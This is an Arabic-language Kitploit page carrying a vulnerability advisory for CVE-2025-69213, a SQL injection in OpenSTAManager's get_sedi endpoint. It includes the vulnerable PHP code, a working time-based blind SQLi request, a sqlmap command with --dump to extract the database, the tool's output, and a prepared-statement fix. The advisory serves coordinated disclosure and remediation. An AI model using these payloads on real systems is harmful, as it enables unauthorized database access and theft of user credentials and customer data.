Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-69213 — CVE-2025-69213 - OpenSTAManager يحتوي على ثغرة حقن SQL في ajax_complete.php (نقطة النهاية get_sedi) | Kitploit
أدوات/GitHubGitHub/lukasz-rybak/cve-2025-69213
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأمن قواعد البيانات
GitHublukasz-rybak/cve-2025-69213

CVE-2025-69213

CVE-2025-69213 - OpenSTAManager يحتوي على ثغرة حقن SQL في ajax_complete.php (نقطة النهاية get_sedi)

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-69213: يحتوي OpenSTAManager على ثغرة حقن SQL في ajax_complete.php (نقطة نهاية get_sedi)

نظرة عامة

الحقلالتفاصيل
معرف CVECVE-2025-69213
درجة الخطورةHIGH
التقرير الاستشاريعرض التقرير
اكتشفهاLukasz Rybak

المنتجات المتأثرة

  • devcode-it/openstamanager (الإصدارات: <= 2.9.8)

تصنيف CWE

  • CWE-89: تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر SQL ('حقن SQL')

التفاصيل

الملخص

توجد ثغرة حقن SQL في نقطة نهاية ajax_complete.php عند معالجة عملية get_sedi. يمكن لمهاجم مُصادَق عليه حقن كود SQL خبيث عبر معامل idanagrafica، مما يؤدي إلى وصول غير مصرح به إلى قاعدة البيانات.

إثبات المفهوم

الكود المعرض للثغرة

الملف: modules/anagrafiche/ajax/complete.php:28

root@kitploit:~
case 'get_sedi':
    $idanagrafica = get('idanagrafica');
    $q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione 
          FROM an_sedi 
          WHERE idanagrafica='".$idanagrafica."' ...";
    $rs = $dbo->fetchArray($q);

تدفق البيانات

  1. المصدر: $_GET['idanagrafica'] → get('idanagrafica')
  2. الموضع القابل للاستغلال: يتم ربط إدخال المستخدم مباشرةً في استعلام SQL بعلامات اقتباس مفردة
  3. المصب: ينفذ $dbo->fetchArray($q) الاستعلام الخبيث

الاستغلال

إثبات مفهوم يدوي (حقن SQL أعمى قائم على الوقت):

root@kitploit:~
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
صورة

الاستغلال عبر SQLMap:

root@kitploit:~
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --dump

مخرجات SQLMap:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
صورة

التأثير

  • سرقة البيانات: استخراج كامل لقاعدة البيانات بما في ذلك بيانات اعتماد المستخدمين وبيانات العملاء والسجلات المالية
  • تصعيد الامتيازات: تعديل جدول zz_users للحصول على وصول إداري
  • سلامة البيانات: تعديل أو حذف غير مصرح به للسجلات
  • تنفيذ أكواد عن بُعد محتمل (RCE): عبر SELECT ... INTO OUTFILE إذا كانت صلاحيات الملفات تسمح بذلك

الإصدارات المتأثرة

  • OpenSTAManager: تم التحقق في أحدث إصدار (حتى ديسمبر 2025)
  • جميع الإصدارات التي تستخدم نقطة النهاية هذه متأثرة على الأرجح

المعالجة

استبدل الدمج المباشر بعبارات مُعدّة مسبقًا (prepared statements):

قبل:

root@kitploit:~
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";

بعد:

root@kitploit:~
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";

المراجع

  • حقن SQL في OWASP: https://owasp.org/www-community/attacks/SQL_Injection
  • CWE-89: تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر SQL

الإشادة

اكتشفها: Łukasz Rybak

المراجع

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69213
  • https://github.com/advisories/GHSA-w995-ff8h-rppg

إخلاء المسؤولية

تم الإفصاح عن هذه الثغرة (CVE) بمسؤولية وفقًا لممارسات الإفصاح المنسق عن الثغرات الأمنية. المعلومات الواردة هنا مخصصة للأغراض التعليمية والدفاعية فقط.

تنزيل الأداة